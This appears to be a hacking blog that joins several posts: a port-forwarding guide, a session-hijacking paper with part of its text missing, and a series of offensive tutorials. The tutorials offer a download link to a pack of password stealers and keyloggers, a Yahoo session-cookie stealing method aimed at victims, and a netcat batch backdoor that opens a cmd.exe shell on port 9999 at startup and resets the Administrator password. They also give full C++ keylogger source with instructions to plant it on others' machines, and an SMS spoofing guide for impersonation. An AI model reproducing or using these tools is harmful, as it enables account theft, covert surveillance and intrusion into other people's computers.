Saturday, May 26, 2012

Easy and Powerful Port Forwarding

INTRODUCTION
For those of you looking to at last find out how to make that darn router work and finally “forward” those darn “ports,” I’ill walk you through the process step by step using language and pictures that will make even the most basic of users able to understand the process.
Now there are a variety of different routers out there, each of course having a different user interface that one must access to make changes to the router. The two most common routers used by individuals are the Linksys and Netgear models. As such, these are the two models I intend to cover, but with a basic detail of how to access and port forward them all.
LINKSYS

The first step in port forwarding is accessing the router. The IP address varies from router to router, so check the manufacturers website or the handbook that was included when purchased. Next open your internet browser and type in the proper IP address according to the directions below.
For LINKSYS the IP address is 192.168.1.1 and the default logins are as follows:
username = admin
password = admin

Also, remember to change the passwords for your router after logging on if you haven’t done so already. Since the user defaults are widely known, and are exactly that–defaults, anyone can log on to your router and leech off your bandwith, or even worse, monitor your web traffic and perhaps even block you from logging on period. So it cannot be stressed enough to change your passwords after logging on.
Okay now for the fun part, forwarding those pesky ports.
After logging on, you will see the main setup page. Click on the Applications & Gaming tab at the top of the page.

This will bring you to the Port Range Forward page. Here is where we will actually forward the ports as the page name implies.

In the first box you will enter the name of the application this will apply to, be it BitTorrent, eMule , eDonkey, or whatever. For arguments sake we will apply it here as BitTorrent, with the specific BitTorrent client to be Azureus. So for Application type “Azureus.“
For the Start and End Port, we’ll be select a port from the reccomended 49152 – 65535 range (For BitTorrent only, and be sure to apply this port number to the Azureus client as well.). Keep in mind that ports used are program specific so check which ones the program requires to be forwarded. Type the port number or range in both boxes.
In the IP Address box type the name of the computer’s Ip address to which this is to apply. If your not sure what the IP address is, follow these easy steps:



At the risk of stating the obvious, if you’ll notice your IP address will be listed there at the top where it says “IP Address.” This is the address for the compueter whose ports you are forwarding.
To finish last thing you want to above in the Port Range Forward page is to check the “enable” box. You’d be surprised at how a lot of people forget to do this simple task. Now click Save Settings at the bottom of the page and were all done. Presto, your ports are now forwarded.
NETGEAR
For NETGEAR the IP adress is 192.168.0.1 and the default logins are as follows:
username = admin
password = password

Also, remember to change the passwords for your router after logging on if you haven’t done so already. Since the user defaults are widely known, and are exactly that–defaults, anyone can log on to your router and leech off your bandwith, or even worse, monitor your web traffic and perhaps even block you from logging on period. So it cannot be stressed enough to change your passwords after logging on.
After logging on, you will arive at the main setup page. Click on the Port Forwarding / Port Triggering tab on the bottom left hand-side of the screen.

This will bring you to the Port Forwarding page.

We’re going to “Add Custom Service,” so click this tab at the center of the page.

In the first box, Service Name, you will enter the name of the application this will apply to, be it BitTorrent, eMule , eDonkey, or whatever. For arguments sake we will apply it here as BitTorrent, with the specific BitTorrent client to be Azureus. So for Application type “Azureus.“
For the Start and End Port, we’ll be select a port from the reccomended 49152 – 65535 range (For BitTorrent only, and be sure to apply this port number to the Azureus client as well.). Keep in mind that ports used are program specific so check which ones the program requires to be forwarded. Type the port number or range in both boxes.
The Server IP Address is the IP address of the computer this is to apply to.
If your not sure what the IP address is, follow these easy steps:

Now type “cmd”

At the risk of stating the obvious, if you’ll notice your IP address will be listed there at the top where it says “IP Address.” This is the address for the compueter whose ports you are forwarding.
To finish, click the Add tab, and then the Apply tab on the port forwarding main page. Presto, your ports are now forwarded. .



Article By Sumit Shukla [Admin]

Session Hijacking in Windows Networks | Best Full Guide Ever

Hope the Works for you guys!I was unable to put the images so ill upload them and name them according to the post:)
Session Hijacking in Windows Networks
1 TCP/IP Basics.........................................................................................................7
1.1 Three-Way-Handshake....................................................................................7
1.1.1 Step 1 - SYN ...............................................................................................8
1.1.2 Step 2 – SYN/ACK ......................................................................................9
1.1.3 Step 3 - ACK .............................................................................................10
1.2 Sequence Numbers .......................................................................................11
2 Session Hijacking Definition..................................................................................12
2.1 Advantages of Session Hijack for the Attacker ..............................................16
2.2 What Makes the Attack so Dangerous?.........................................................17
3 The Session Hijack Attack ....................................................................................19
3.1 Procedural Overview of the Session Hijack Attack ........................................19
3.1.1 Step 1 - Locating a Target .........................................................................19
3.1.2 Step 2 - Find an Active Session ................................................................20

3
3.1.3 Step 3 - Perform Sequence Number Prediction ........................................20
3.1.4 Step 4 - Take One of the Parties Offline....................................................21
3.1.5 Step 5 - Take over the Session and Maintain the Connection...................22
4 Session Hijack Tools.............................................................................................22
5 Detecting Session Hijack Attacks..........................................................................24
5.1 Packet Sniffers...............................................................................................24
5.1.1 Normal Telnet Session ..............................................................................25
5.1.2 The Attack Begins - Forcing an ARP Entry................................................26
5.1.3 Hijack Traffic..............................................................................................28
6 Session Hijacking Remediation.............................................................................33
6.1 Protect Against Spoofing ...............................................................................35
6.2 IPSec and Encryption ....................................................................................36
6.3 Intrusion Detection Systems and IPS Intrusion Prevention Systems .............38

4
6.4 Eliminating Insecure Network Protocols and Operating Systems ..................39
6.5 GPO - Group Policy Objects ..........................................................................40
7 Summary ..............................................................................................................45
8 References ...........................................................................................................47

5
Introduction
Before we can explore the session hijack attack, it is essential that we gain a basic
understanding of network communications. The first section of this paper covers some of this
background information needed to understand how computers communicate on a network.
First we take a look at the TCP/IP protocol (Transmission Control Protocol/Internet Protocol)
examining a concept critical to network communication called the three-way-handshake.
Once we have a basic understanding of these concepts, we can then work towards
understanding how the session hijack attack exploits the design flaws inherent in the TCP/IP
protocol.
In section two, the session hijacking attack is defined. The benefits of the attack are
closely examined as well as the danger the attack presents to your network.
Section three examines the session hijack attack in detail. The session hijack attack is
broken down into five steps including locating a target, finding an active session, sequence
number prediction, taking a user offline, and taking over a session.
Detecting the session hijack attack on a network can be very difficult. In section four , session hijacking detection will be examined. Attack signatures will be examined
and real world examples provided.

6
Section five examines session hijacking software applications that are used by
attackers to compromise computers. Windows and Linux/Unix applications will be reviewed,
and their features described.
Section six discusses the various ways in which session hijacking can be detected on
the network. Using Wireshark, packet captures of a session hijack attack are examined.
Section seven looks at the various countermeasures that can be implemented on your
network that will help reduce your exposure to this attack. Microsoft Group Policy Objects,
IPSec, IDS and IPS systems, and insecure network protocols and operating system will be
examined.

7
1 TCP/IP Basics
Before we explore the session hijack attack, readers must possess a basic
understanding of how computers communicate with one another on a network. In the section
that follows, we will look at some basic elements of TCP/IP (Transmission Control
Protocol/Internet Protocol) protocol specifically the concepts of the three-way-handshake and
random initial sequence number generation.
In order for two machines to communicate on a network they have to negotiate
common communication parameters. This is done by transmitting a series of data packets
between the two machines in a process known as the three-way-handshake. All computers
on the network must complete this process in order to establish a connection with another
computer on the network.
1.1 Three-Way-Handshake
When two computers want to communicate with one another, they have to negotiate
the technical parameters that they will use to communicate with one another. This is done
through a process known as the three-way-handshake. Once the connection is established,
the session remains open until one of the machines sends a RST (reset) or FIN (finish)

8
packet to their communication partner.
The three-way-handshake is comprised of three main processes. Please note that the
discussion that follows is based on a scenario where a single workstation computer is
attempting to communicate with a file server.
1.1.1 Step 1 - SYN
When a workstation wants to communicate with a server it builds a packet with
the SYN or synchronization bit set and then sends the packet to the server. Included in this
SYN packet is an initial sequence number (denoted in figure 1 as X)
Figure 1 – Step 1 SYN
When the client computer generates the sequence number, it uses a random number
generator. Random number generators are used to help prevent communication sessions
from being compromised (more on this in the next section). Sequence numbers are critical to
network communications as they are used to guarantee packet delivery. Source computers

9
use sequence numbers for tracking incoming packets and reassembling them as they arrive
at their destination. From the attacker’s perspective; however, the ability to predict sequence
numbers provides the mechanisms needed to successfully hijack a communication session.
1.1.2 Step 2 – SYN/ACK
When the server receives the clients SYN (synchronization) packet, it responds to the
workstation computer with a packet containing both the SYN and ACK (Synchronization and
Acknowledgement) bits set. The packet includes the server’s own randomly generated
sequence number (represented in the drawing by the letter P). The server also acknowledges
the clients sequence number by adding 1 to the sequence number sent by the client computer
(X + 1) (Lamb, 2006).
Figure 2 – Step 2 SYN/ACK

10
1.1.3 Step 3 - ACK
The final phase of the three-way-handshake involves the client sending an ACK packet
to the server confirming its desire to communicate. The workstation prepares a packet with
the ACK (acknowledgement) bit set and includes an acknowledgement sequence number (X
+ 1). When the packet arrives at the destination server, the communication session is
established and communication can now begin. An active communication session will be
maintained until one of the machines sends a RST (Reset) or FIN (Finish) packet to the other
computer
Figure 3 – Step 3 ACK
The following screen output from Wireshark shows what a three way handshake looks
like in Wireshark. Packet number three begins the three-way-handshake process by sending
a SYN (synchronization) packet to the server. The server then acknowledges the receipt of
the SYN packet by sending the workstation computer a SYN/ACK
(Synchronization/Acknowledgement) packet (show in packet four). The final step in the three

11
way-handshake is an ACK packet sent to the workstation by the server.
Figure 4 - Example of the Three-Way-Handshake in Wireshark (Resultspk.com, 2006)
1.2 Sequence Numbers
Sequence numbers are an essential component of network communications. It is the
sequence number that insures reliable communication on the network. As packets leave the
transmitting computer, each packet is assigned a unique sequence number. Sequence
numbers provide a mechanism which allows the receiving computer to track incoming packets

12
and reassemble then into a logical stream of data. Sequence numbers can also be used to
detect packets that have not arrived at the destination computer. When packet loss is
detected, the destination machine notifies the source computer to resend the missing packet.
TCP/IP sequence numbers are 32-bit numbers, thus providing four million possible
number combinations. While this seems like a sufficient quantity of numbers to reduce the
chance of sequence number prediction, modern computers make this number arbitrary. Most
modern operating systems implement pseudo random number generators that produce
complex sequence numbers sufficient enough to make sequence number prediction difficult if
not impossible. However, older operating systems, such as Windows NT 4.0, did not provide
sufficient random number generation as discussed in Microsoft knowledge base article MS99-
046. As you will see in the sections that follow, sequence numbers, and the ability to predict
sequence numbers, are a vital component necessary to successfully wage a session hijack
attack.
2 Session Hijacking Definition
If you are like most security professionals, session hijacking is not an attack that gets a
lot of your attention. In recent years, the session hijack attack has been overshadowed by
spyware, root kits, bot networks, and denial of service attacks. Although the session hijack

13
attack is not in the forefront of everyone’s mind, it still remains a commonly used attack. In
fact, Kevin Mitnick used many of the underlying principals common to session hijacking in his
famous breach of Tsutomu Shimomura’s computers (Meriwether, 1995).
Session hijack attacks are defined as taking over an active TCP/IP communication
session without their permission or knowledge. When implemented successfully, attackers
assume the identity of the compromised user, enjoying the same access to resources as the
compromised user.
Session hijack attacks are usually waged against users that are members of large
networks containing a substantial number of open sessions. Network protocols like FTP,
Telnet, and rlogin are especially attractive to the attacker, because of the session oriented
nature of their connections, and the length of their communication sessions. Additionally,
FTP, TELNET, and rlogin do not implement any security during logon, authentication, or data
transmission. In fact, data sent using these protocols is sent in clear text which can be easily
be viewed by anyone monitoring the network.
There are three different types of session hijack attacks; active, passive, and hybrid.
The active attack is when the attacker hijacks a session on the network. The attacker will
silence one of the machines, usually the client computer, and take over the clients’ position in

14
the communication exchange between the workstation and the server. The active attack also
allows the attacker to issue commands on the network making it possible to create new user
accounts on the network, which can later be used to gain access to the network without
having to perform the session hijack attack.
Figure 5 - Aggressive Session Hijack Attack
Passive session hijack attacks are similar to the active attack, but rather than removing
the user from the communication session, the attacker monitors the traffic between the

15
workstation and server. The primary motivation for the passive attack is it provides the
attacker with the ability to monitor network traffic and potentially discover valuable data or
passwords.
File Server
`
Workstation PC
`
Attacker
The workstation remains online
while the attacker listens to all
traffic that is sent between the
server and workstation.
The attacker listens to
the traffic sent between
the two machines, but
does not remove the
workstation computer
from the session.
Figure 6 - Passive Session Hijack
The final type of session hijack attack is referred to as the hybrid attack. This attack is
a combination of the active and passive attacks, which allow the attacker to listen to network
traffic until something of interest is found. The attacker can then modify the attack by
removing the workstation computer from the session, and assuming their identity.

16
2.1 Advantages of Session Hijack for the Attacker
So what makes the session hijack attack worthwhile for the attacker? One of the most
valuable byproducts of this type of attack is the ability to gain access to a server without
having to authenticate to it. Once the attacker hijacks a session, they no longer have to worry
about authenticating to the server as long as the communication session remains active. The
attacker also enjoys the same server access as the compromised user because the user has
already authenticated to the server prior to the attack.
A successful session hijack attack also allows the attacker to issue commands to
servers on the network. This is usually done to create user accounts that can be used to
access resources at a later date. The ability to issue commands also provides a way to mask
the attacker’s presence on the network, by removing or altering the remnants of the attack.
The session hijack attack is very stealthy. Session hijack attacks are usually waged
against busy networks with a high number of active communication sessions. The high
network utilization not only provides the attacker with a large number of sessions to exploit,
but it can also provide the attacker with a shroud of protection due to the large number of
active sessions on the server.
Most network attacks depend on software or hardware vulnerabilities as a gateway to

17
an attack. Having knowledge of specific vulnerabilities in these technologies allow the
attacker to scan servers to determine what vulnerabilities exist. However, the session hijack
attack does not depend on specific software or hardware vulnerabilities, but rather a design
limitation within the TCP/IP protocol that does not guarantee security after the connection is
made.
Session Hijacking is also very easy to do, especially on older operating systems!
Utilizing commercially available software packages, even a novice computer user has a good
chance at successfully waging a session hijack attack.
2.2 What Makes the Attack so Dangerous?
Why is the session hijack attack so dangerous? Should security professionals really be
concerned? The answer to both of these questions is yes! As I hinted in the previous
paragraph, the risks resulting from session hijack attacks can not be eliminated by software
patches, complex passwords, or multi-factor authentication. The root cause of the attack lies
with design limitations inherent to the TCP/IP protocol. In addition, all machines regardless of
operating system or hardware architecture are vulnerable to the session hijack attack
provided they are running TCP/IP.
The attack also exploits all three sides of the CIA triad. The CIA triad is a
18
representative model of security concepts consisting of three underlying principals.
Confidentiality, integrity, and availability make up the triad and A failure on any side of the
triad represents a compromise in network security (Cole, E. & Fossen, J. & Northcutt, S. &
Pomeranz, H., 2005).
Figure 7 - CIA Triad
The session hijack attack compromises all three sides of the CIA triad. When a
successful attack is achieved, the attacker has the ability to read and modify data, violating
the confidentiality and integrity portion of the model. Availability is also affected by the session
hijack attack due to ARP storms and denial of service conditions that are a byproduct of the
attack.

19
3 The Session Hijack Attack
The session hijack is a process whereby the attacker inserts themselves into an
existing communication session between two computers. Generally speaking, session hijack
attacks are usually waged against a workstation server type of communication session;
however, hijacks can be conducted between a workstation computer communicating with a
network based appliance like routers, switches or firewalls.
3.1 Procedural Overview of the Session Hijack Attack
As outlined in the book by Eric Cole, Hackers Beware: The Ultimate Guide to Network
Security, the session hijack attack contains the following steps (Cole, 2002).
3.1.1 Step 1 - Locating a Target
The first step in the session hijack attack is locating a target user. Attackers look for
two things prior to their attack. First, they look for networks that have a high level of utilization.
High volume networks provide a healthy supply of users to choose from, which also helps the
attack remain anonymous. Secondly, users who frequently use insecure network protocols
such as Telnet, rlogin (remote logon), and FTP (file transfer protocol) are also frequent targets
due to their inherently insecure design.

20
Packet sniffing software can be used to sniff network traffic for the purpose of locating
vulnerable protocols like FTP, Telnet, and rlogin. Port scanning software can also be used to
identify servers that have FTP, Telent, or rlogin ports open.
3.1.2 Step 2 - Find an Active Session
Session hijack attacks are usually waged against servers with large amounts of
activity. The reason is twofold, high network utilization provides an environment containing
adequate sessions that can be exploited. Secondly, the high usage on the server helps hide
the disruption caused by the attack. Attackers generally target session oriented protocols like
FTP, Telnet, and rlogin which provide prolonged connections to other computers.
Attackers who are looking for open sessions generally use software tools like
Wireshark or more sophisticated site detection software that is included in some of the
popular session hijacking software packages like T-Sight or Juggernaut.
3.1.3 Step 3 - Perform Sequence Number Prediction
Now that a target has been chosen, the next step in the session hijack process is
sequence number prediction. This process entails guessing the next sequence number that
the server is expecting from the workstation. Sequence number prediction is a critical step,
because failing to predict the correct sequence number will result in the server sending reset

21
packets and terminating the connection attempt. If the attacker guesses the sequence
numbers wrong repeatedly, the likelihood of detecting the attack increases.
So how do you accurately predict the next session number? While sequencing number
guessing can be done manually by skilled attackers, software tools are available to automate
the process. Programs such as Juggernaut (www.packetstorm.securify.com), Hunt
(http://fsid.cvut.cz/~kra/index.html), and T-Sight (http://www.engarde.c...ftware/t-sight/)
are very effective tools that can be successfully used by attackers of moderate skill levels.
3.1.4 Step 4 - Take One of the Parties Offline
Once a session is chosen and sequence numbers predicted, you need to
silence the workstation computer. This is generally done with a denial of service attack;
however, any attack that renders the computer unable to communication on the network
would work just as well. The attacker must ensure that the client computer remains offline for
the duration of the attack or the client computer will begin transmitting data on the network
causing the workstation and the server to repeatedly attempt to synchronize their connections
resulting in a condition known as an ACK storm.
Taking the client computer offline is only done in an aggressive session hijack attack.
Remember, the passive attack is used to view data as it flows across the network; therefore,

22
removing the workstation in this scenario would prohibit the attacker from examining the
communications between the two machines.
3.1.5 Step 5 - Take over the Session and Maintain the Connection
The final phase of the session hijack attack entails taking over the communication
session between the workstation and server. The attacker will spoof their client IP address, to
avoid detection, and include a sequence number that was predicted earlier. If the server
accepts this information, the attacker has successfully attacked the communication session.
Because the attackers’ source address has been spoofed, the attacker will not receive any
feedback regarding the status of the attack. As a result, the attacker will have to understand
what the server is expecting to maintain the attack.
At this point in the attack, full access to the network is limited only by the permissions
of the compromised user or computer. Provided that the TCP/IP session is maintained, the
attacker will not have to repeat the hijack process for the duration of the connection.
4 Session Hijack Tools
While session hijacking is possible without the assistance of hijacking software, many
attackers choose to use software tools due to their ease of use. The session hijacking tools
available today provide precision, timing, and session prediction capabilities.

23
Juggernaut is one of the most popular software packages for session hijacking and it
runs only on the LINUX operating system. Juggernaut contains a built in network sniffer which
aids in the hijacking process and allows the attacker to watch for keywords as they flow
across the network. Juggernaut is frequently used when attackers want to capture passwords
as they flow across the network.
Hunt, another UNIX based software application, is primarily used for session hijacking
attacks where attackers want to listen and intercept network communications, as well as
hijack open sessions on a network. Sequence number prediction, and silencing the
workstation computer are all handled internally by the software.
T-Sight, written for the Windows Operating system, is a commercially available product
that provides most of the functionality of the UNIX software variants. The application can be
purchased from Engarde at the following web site (http://www.engarde.c...oftware/t-sight).
This commercial application was intended to be used by professional security engineers;
however, it is very effective in the hands of an attacker. T-Sight automates the selection of
open sessions, provides accurate sequence number predication, and is capable of silencing
target workstations.

24
5 Detecting Session Hijack Attacks
There are two primary technologies that assist in session hijack detection. The more
manual of the two methods is packet sniffing software which can be used to scan for
signatures of an attack. Intrusion detection systems (IDS) and intrusion prevention systems
(IPS) provide a more automated method of detection, but they can also create more analysis
work for the security administrator.
5.1 Packet Sniffers
Packet sniffers are software applications that possess the ability to capture packets as
they flow across the network. Once captured, the contents of the packets can be examined
using a variety of filtering tools. One of the most popular packet sniffers on the market is
called Wireshark and it is available for free at http://www.wireshark.org/.
Using packet sniffing software to detect session hijack attacks can be very difficult.
Doing so requires the user to configure the software to scan the network while displaying the
results to the computer screen in real time. After initiating the scan, the operator would have
to analyze the data in real time as it is displayed on the screen. Due to the difficultly
surrounding this method, packet sniffing software is generally used as an investigative tool
rather than a front line detection or defense tool.

Session Hijacking in Windows Networks
25
The following Wireshark screen shots show us what the various steps of the session
hijack attack look like within Wireshark.
5.1.1 Normal Telnet Session
Now that the communication session has been established, the client and server can
communicate via the Telnet protocol. This screen shot shows what a normal telnet
communication session looks like in Wireshark. You can clearly see data packets being sent
to the server and subsequently acknowledged by the server.

26
42
settings.
The group policy material outlined below is based on a Windows 2003 Native domain
structure with client computers running Windows 2000 Professional or Windows XP
Professional workstations. Networks consisting of older operating systems like Windows
95/98/ME or Windows NT 4.0 can not be secured using GPO’s due to their lack of support for
Active Directory.

SummaryIn the era of viruses, worms, malware, buffer overflows and alike, the session hijack
attack is still alive and well. The attack is very effective and can provide the attacker with
unlimited access to server resources. The session hijack attacks allows the attacker to
monitor the network for password information which can later be used to create access
accounts on the compromised machine, or intercept data flowing between the client and
server.
Defending against the session hijack attack is very difficult because the attack is not
dependant on software vulnerabilities, but rather, protocol limitations within the TCP/IP
protocol. Some of the byproducts of the attack are subtle, and are usually dismissed by users
and network administrators as normal network events.
A variety of methods can be used to reduce your exposure to the attack including
intrusion detection and intrusion prevention systems, firewall configuration, IPSec, secure
FTP and Telnet, and Windows 2000/2003 Group policy objects. These technologies
implemented together for form a defense in depth strategy, can provide a great deal of
protection against the session hijack attack.

Silent Keylogger

Top 66 Stealer Keylogger Pack 100% Virus Free

Dimension Stealer 2 by Gumball.rar
Dark Screen Stealer 2.rar
CyberShark.rar
Codesoft PW Stealer 0.50.rar
Codesoft PW Stealer 0.35.rar
Blade Stealer 1.0 PUBLIC.rar
bl0b Recovery 1.0.rar
Armageddon Stealer 1.0 by Krusty.rar
Ardamax 3.0.rar
Allround Stealer.rar
Albertino_Simple_Keylogger.rar
1337 SteamACC Stealer Private.rar
ZH_Stealer_v.5.rar
Viotto Keylogger 2.0.rar
UNLIMITED_PW_STEALER_0.4.rar
Universal1337 v3.rar
Universal1337 v2.rar
Universal1337 - The Account Stealer.rar
Ultimate Stealer 1.0.rar
Tool-Store FileZilla Stealer 1.0.rar
The Simpsons Stealer 0.2.rar
System Stealer 2.rar
StupidStealerv6_HackHound.rar
Stupid Stealer 6.5 (Fix with WIN7).rar
Stupid Stealer 6 mit PHP Logger.rar
Steel.rar
Steam Stealer by till7.rar
Steam Stealer 1.0 by ghstoy.rar
SStealer by till7.rar
SPS Stealer.rar
SimpleStealer 2.1.rar
Sharp Keylogger v1.0.rar
SC LiteStealer 1.rar
Remote Penetration 2.2.rar
RefStealer1.2.rar
RapZo Logger v 1.5 ( Public Edition ).rar
Rapid Keylogger v 1.1.rar
PWStealer 2.0.rar
Pure-Steam 1.0 CS.rar
Public Firefox 3 Stealer.rar
ProStealer.rar
pixel Stealer 1.4.0.rar
pixel Stealer 1.3.0 SC.rar
Pesca Stealer 0.2.rar
Pass Stealer 3.0.rar
Papst Steale.NET.rar
Multi Password Stealer 1.6.rar
LabStealer by Xash.rar
iStealer_6.3_Legends.rar
iStealer_4.0.4+ Tools.rar
IStealer 6.0 Legends.rar
IStealer 4.0.rar
ICQ Steal0r.rar
HardCore Soft 0.0.0.1.rar
Hackhound Stealer.rar
Hackhound 0.0.1.4.rar
Hackbase Steam Phisher 1.2 BETA.rar
Gmail_Hacker.rar
Fudsonly Stealer 0.1.rar
Fly Stealer 0.1.rar
Firefox Password Stealer - Steamcafe.rar
Firefox Password Stealer.rar
FileZilla Stealer by Stonedinfect.rar
FileZilla Stealer 1.0 PUBLIC.rar
EasyLogger2.1_Public.rar

Download:- http://filesmy.com/1j85j3 Password:- haloxss

Hack email accounts or passwords using session cookies

What are Session Cookies or Magic Cookie or Session ID?
Lets discuss this in very simple language, Whenever we login in our account, it generates a unique string that contains the path of automatic login for particular time then after that limited time it expires by itself.
Note its life is only up to when your web browser is open. If you close your web browser it will be get deleted(Its latest up gradation in cookie's field for providing more security).
Now this unique string or simply called Magic cookie is stored at two places first copy is stored on server(of which we cannot do anything) and second is stored in our web browser in form of cookie.
This cookie is destroyed by three ways first is when you close your web browser, second is when you sign out of your account and third is if you left your account open for more than 20 minutes idle.

How to access the cookies on local system?
As i am explaining this tutorial for hacking yahoo email account. So in your web browser just open yahoo.com and login into your account.
After that type the below code exactly and then press enter:

javascript:alert(document.cookie);
Now create one fake account on yahoo.com and login in that account and retrieve the cookie in same manner and notice the changes in session ID's.

For hacking the session cookies we first need the session cookies of the victim and its quite simple to get the session cookies of the victim. You just need to send him one link as soon as he clicks on that we will get his session cookie.

After hacking the session cookies, we can use stolen session cookie to login into victim's account even without providing username and password as i already explained that session hacking removes the authentication on the server as we have the AUTO LOGIN cookie. In this type of attack when victim sign out , then hacker will also sign out. But in case of YAHOO its little bit different, when victim signout but attacker still have the access to his account. Yahoo maintains the session for 24 hours and then destroy the session ID's from its server.

How to Steal the Session Cookies?
1. Go to the Website and register there:
Code:

http://www.my3gb.com/register.jsp

2. Download the Cookie stealer files:
[
Code:

url=http://www.mediafire.com/?q4oo0encvhtxoa1]Yahoo_Cookies_Hack_Isoftdl.com.zip[/url]

Now upload the four files on the website and create one empty directory naming cookies
4. Now Send the link of yahoo.php to victim. Now what will happen when user clicks on the yahoo.php is that its cookies are get stored into directory Cookies and simultaneously he is redirected to his account.

5. Now open the link Hacked.PHP to access the cookies. In my files the password is "password". You need to put that to access the files.
6. You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password.
Now it doesn't matter if victim signs out from his account, you would remain logged into it.

Note: You can try this attack by using two browsers. Sign into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.

Hacking a Network Administrator Computer | Hackers Club

Hello dear frinds Today Itech U how to Hack Network Adminestartor Computer with Easy Methos My All Tricks easy understand Every one

As we all know, a Trojan is very likely to be picked up by AV, what you need is Netcat, netcat
opens a port on a computer for access (If used correctly by a batch file you open a port on a
target computer). You will need to write a batch file. The batch file to copy netcat on the
remote computer will have to be run from the target computer (The person on the target will
have to execute the batch file in some way). Open Notepad and type this in:

Code:

@echo off

cd\
xcopy \\yourIP\shared folder\netcat.exe
copy \\yourIP\shared folder\netcat.exe (just to be sure)
cd "Documents and Settings"
cd "All Users"
cd "Start Menu"
cd Programs
cd Startup

xcopy \\yourIP\shared folder\Startup.bat (This is another batch file you will write)
cd\
netcat.exe -L -p 9999 -d -e cmd.exe
Save the file as a batch file using Notepad.

The next batch file will be used to make sure the port you specified opens up every time
windows starts up, you can specify any port you wish. Open Notepad and type:

Code:

@echo off

cd\
netcat.exe -L -p 9999 -d -e cmd.exe

Save the file as a batch file using Notepad, this will be the file that is copied into the
startup folder in the previous batch file we wrote. You can bind the batch file to another
file and share that file, let the target execute that file so that he can copy netcat and the
other batch file onto his/hers computer thus opening port 9999, after port 9999 has been
opened you can then use telnet and telnet to that port on the target computer to have full
access without ever needing any passwords of any sort. After you are in change the
Administrator password for if something happens to your files, the command is this:

Code:

net user Administrator newpassword

Code:

shutdown -r -t 10 -c "Hello"

the computer will then restart in 10 seconds time. You can even play around more by Installing
Cain & Abel on your computer and then installing Abel remotely on his computer (Since you know
the Administrator password) Once you have Abel on the target you can start and stop services
and do more!

Enjoy !

How to create a keylogger in C++

Hi friends, the most interesting part of the hacking is spying. Today i am going to introduce to the C++ Spyware code. It is going to be very fun. You can install this spyware in your college/school or in your friend system, and get their username and passwords. This is very simple hacking trick when compared to phishing web page.

Disadvantage of Phishing Web page:
you have to upload phishing web page to web hosting. But only few website won't detect the phishing webpage.
website url is different. Easy to detect that we are hacking.

Advantage of Spyware-keylogger:
Very simple and easy method.
Victim can't detect that we are hacking.

How to create Keylogger using Visual C++?
Requirements:
Dev C++.
Knowledge about Visual C++(need, if you are going to develop the code).

Install dev C++ in your system and open the dev C++ compiler.
Go to File->New->Source File.
you can see a blank works space will be there in window.
now copy the below keylogger code into the blank work space.

#include
using namespace std;
#include
#include
int Save (int key_stroke, char *file);
void Stealth();

int main()
{
Stealth();
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}

Compile the Code(Ctrl+F9)

Now execute the program by selecting Execute->Run(ctrl+F10)

now your keylogger will run in your system. whatever you type using keyboard. It will be stored in Log.txt file.
you can see the log.txt file where you save the file.

bind the exe file with image or any files and send it to your friend.
(0r)
if you have physical access to your college/school system,then copy the exe file in that system and run it.

SMS Spoofing | Works all over the world

Hi everyone,
i would like to share the sms spoofing service that i have been using lately with you all .
Earlier Sauhard123 had posted a TUT on how to spoof sms , but that only worked in india .
The sms spoofing service that i'd be sharing today works worldwide .
and above all You get free credits initially (Credit limit varies upon the country you'd use it in) .
So what is SMS spoofing ?
SMS spoofing is a relatively new technology which uses the short message service (SMS), available on most mobile phones and personal digital assistants, to set who the message appears to come from by replacing the originating mobile number (Sender ID) with alphanumeric text. Spoofing has both legitimate uses (setting the company name from which the message is being sent, setting your own mobile number, or a product name) and illegitimate uses (such as impersonating another person, company, product).
This is not actually a trick or hack but a service offered by a company. But the only thing the company forgot is internal send ID Check i.e. which number we are using to send SMS. So this service allows us to send SMS from any number to any number that means. Now the number that we want to display would be displayed to the slave, though in actual the number that would have diplayed by default would have been the number that you registered at the service with.
Hence we are exploiting the Internal sender ID phone verification feature.
Features
1. SMS spoofing itself ( send texts from any mobile number to any mobile number )
2. Messages are 100% anonyous , though using proxies is preferred while accessing the service
3. Spoofing Works Globally.
4. No Ads
5. No Spam
6. Texts get delivered Instantly.
Ok , so now talking about the service .
Well First Go To This Link ( Link removed ) ( Too Many Leechers)
PM me for the link
Signup .
While signing up provide a cell number that is accessible to you, as you'd recieve your accounts password at this number only .
Now when you have signed up, Go to "Send SMS to Number" Tab located in the left side of your browsing page.
In the "Send SMS To" Textbox type in the reciever's Number.
Now in the "Sender ID From" Textbox, type the number you want to display to your slave.
What Else you can do with SMS spoofing :
Update slave's Facebook status:
This had already been posted By Sauhard123
and it only works in India
